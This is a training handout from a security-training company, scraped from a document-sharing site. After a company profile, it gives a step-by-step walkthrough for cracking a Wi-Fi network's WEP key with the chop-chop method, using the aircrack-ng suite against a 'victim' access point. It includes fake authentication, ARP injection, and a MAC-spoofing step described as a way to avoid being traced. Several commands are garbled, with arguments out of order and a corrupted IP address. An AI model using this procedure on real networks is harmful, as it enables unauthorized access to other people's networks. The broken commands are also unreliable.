This action might not be possible to undo. Are you sure you want to continue?
Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the benefit of the students & making them aware of the latest trends in technological era of the Computer age.e. Security Specialist. IT Professionals. This library was furnished. Bank Employees. All the modules have been designed in order to provide students with specialized knowledge by specialized trainers. The main activities of Secugenius Security Solutions are providing training in Information Security and various professional courses. . We believe in spreading knowledge to all the youngsters & growing minds of the nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime Investigation & Forensic Sciences Secugenius provides various security solutions to its clients by securing their websites from cyber attacks. Education is delivered to students through two modes i. managed and funded by the Founders and Directors of Secugenius Er. Secugenius Security Solutions is an organization which believes in inventing and implementing new ideas to influence the technological minds of the youngsters Looking at the number of Cyber Crimes since last many years. In the workshops conducted by Secugenius. Police officials. The overall resource person for the content of the series of this Digital Library is Er. participants can claim to be trained by the highly experienced & skilled corporate trainers from different parts of the nation. Chetan Soni . We at Secugenius Security Solutions provides training on Ethical hacking & Cyber Security to students.SECUGENIUS SECURITY SOLUTIONS -------------------------------------------------------------------------------------- (A UNIT OF HARKSH TECHNOLOGIES PVT.Sr. We at SECUGENIUS are headquartered at Ludhiana. We provide training to college students. Secugenius Security Solutions. graduates and professionals in various fields. Kshitij Adhlakha . This Online Digital Library has been initiated as a free resource & permanent resource on specialization basis for every student of Team Secugenius. We believe in making the base of students to be as strong as possible. the Manchester of Punjab. Regular mode and Distance mode which are available as short term and long term courses. LTD) Company Profile: Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. Harpreet Khattar & Er.
info@secugenius. Punjab – India firstname.lastname@example.org.Wi-Fi WEP Cracking using Chop-Chop Method Product ID No: SG/ODL/13028 Founder & Director: Harpreet Khattar & Kshitij Adhlakha Resource Person: Chetan Soni & Loveleen Arora Secugenius Security Solutions SCO-13A. Ludhiana-141002.in . www.secugenius. Near Krishna Mandir. Model Town Extn.com www.com .seculabs.
we use to send the Deauthentication packets to the client’s connected to the victim’s AP (Access Point). But what if clients are not there…??? No packets are being captured…??? So in that case Deauth does not work. Solution to this is “CHOP-CHOP METHOD” Requirements for CHOP-CHOP Method: MAC address of Your System BSSID ESSID Channel ID Wireless Interface Windows 2000/Xp/Seven/Vista/8/Linux Distro Backtrack Linux Operating System (Live or ISO) VMware Workstation (If you use an ISO File) Wireless USB Adaptor (If you use VMware Workstation) Our System Configuration Details: MAC Address BSSID ESSID Channel ID Wireless Interface Security = = = = = = 00:11:22:33:44:55 80:1F:02:02:6C:C4 Chetansoni 11 wlan0 WEP (64-Bit Encryption) First Start Backtrack Linux Operating system inside VMware Workstation named as BT-5-R3 Version. Some Basic Commands which is very helpful when you use Backtrack. iwconfig ifconfig pwd ls startx Username – root and Password – toor (By Default in BT5) . then we capture the reply packets and crack WEP.In previous WEP cracking method.
root@bt:~# iwconfig Wlan0 IEEE 802.Step 1 — Start Terminal and type this command for checking your wireless device.11bgn ESSID:off/any Mode:Managed Access Point: Not Associated Tx-power=20 Dbm Retry long limit:7 RTS thr:off Fragment thr:off Encryption Key:off Power Management:off .
Step 2 – Start the wireless interface in monitor mode by using this command. root@bt:~# airmon-ng start wlan0 .
Step 3 – Observe the wireless connections within range and copy the BSSID and channel number of your victim’s AP (Access Point) root@bt:~# airodump-ng mon0 Here’s Our Target = Chetansoni (Bssid – 80:1F:02:02:6C:C4 with Channel – 11) .
root@bt:~# airodump-ng 80:1F:02:02:6C:C4 mon0 Where. -c = Channel ID -w = Writing captured data --bssid = MAC Address of AP (Your Target) mon0 = Monitor Mode –c 11 –w Chetansoni --bssid .Step 4 – Further. we use airodump-ng with some options to view the details of the victim’s AP.
root@bt:~# ifconfig wlan0 down root@bt:~# macchanger --mac 00:11:22:33:44:55 wlan0 root@bt:~# ifconfig wlan0 up . For doing that.Step 5 – Now Change your MAC address so that nobody can trace you back. first make your wireless device down and after changing MAC. make it up.
In order for an access point to accept a packet.Step 6 – Use aireplay-ng to do a fake authentication with the access point. the source MAC address must already be associated. The lack of association with the access point is the single biggest reason why injection fails. use fake authentication: root@bt:~# aireplay-ng -1 0 -e Chetansoni -a 80:1F:02:02:6C:C4 -h 00:11:22:33:44:55 mon0 Where. If the source MAC address you are injecting is not associated then the AP ignores the packet and sends out a “Deauthentication” packet. -1 0 -e Chetansoni -a 80:1F:02:02:6C:C4 -h 00:11:22:33:44:55 mon0 = Fake Authentication = Reassociation (In seconds) = Wireless network name = Access point MAC address = our card MAC address = wireless interface name . To associate with an access point. no new IVs are created because the AP is ignoring all the injected packets. In this state.
Step 7 – Use aireplay-ng chopchop or ARP replay attack root@bt:~# aireplay-ng 80:1F:02:02:6C:C4 mon0 -4 -h -b -4 -h 00:11:22:33:44:55 -b = Arp Replay attack of Aireplay-ng = MAC Address of your wireless Device = Bssid or MAC of AP .
I’ll capture ARP replay packets and after its completion. it will create a XOR file named as “replay_dec-1215134729.Step 8 – Whenever you type ―y‖ in the last step.xor” .
255.255) -l 255. IP (most APs respond to 255.255) -y replay_dec-1215-134729.255. -0 = It generates ARP packet -a 80:1F:02:02:6C:C4 = Access point MAC address -k 255.255.255 = Source IP (most APs respond to 255.xor = to read the PRGA -w arp-request = Name of file to write the ARP packet .255 –y replay_dec-12151347184.108.40.206.xor –w arp-request Where.255 = Dest.255.255.255.255.255.Step 9 – Use packetforge-ng to make the XOR file usable for cracking into aircrack-ng root@bt:~# packetforge-ng -0 –a 80:1F:02:02:6C:C4 –k 255.255 –l 255.255.
Step 10 – Inject the ARP packet by using this following command: root@bt:~# aireplay-ng -2 –h 80:1F:02:02:6C:C4 –r arp-request mon0 Where. -2 =Use interactive frame selection -h = Fake MAC -r arp-request = Defines the file name from which to read the Arp packet mon0 = Defines the monitor mode Use this Packet – ―Y‖ .
Step 11 – Run aircrack-ng to obtain the WEP key root@bt:~# aircrack-ng –n 64 –z –f 1 –e Chetansoni –b 80:1F:02:02:6C:C4 Chetansoni-01.cap -n -e -b Cap = Number of WEP bits key Applied e. .256 bit = Victim’s ESSID = Victim’s BSSID = capture file which we mentioned in airodump command.g. 64.128.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue reading from where you left off, or restart the preview.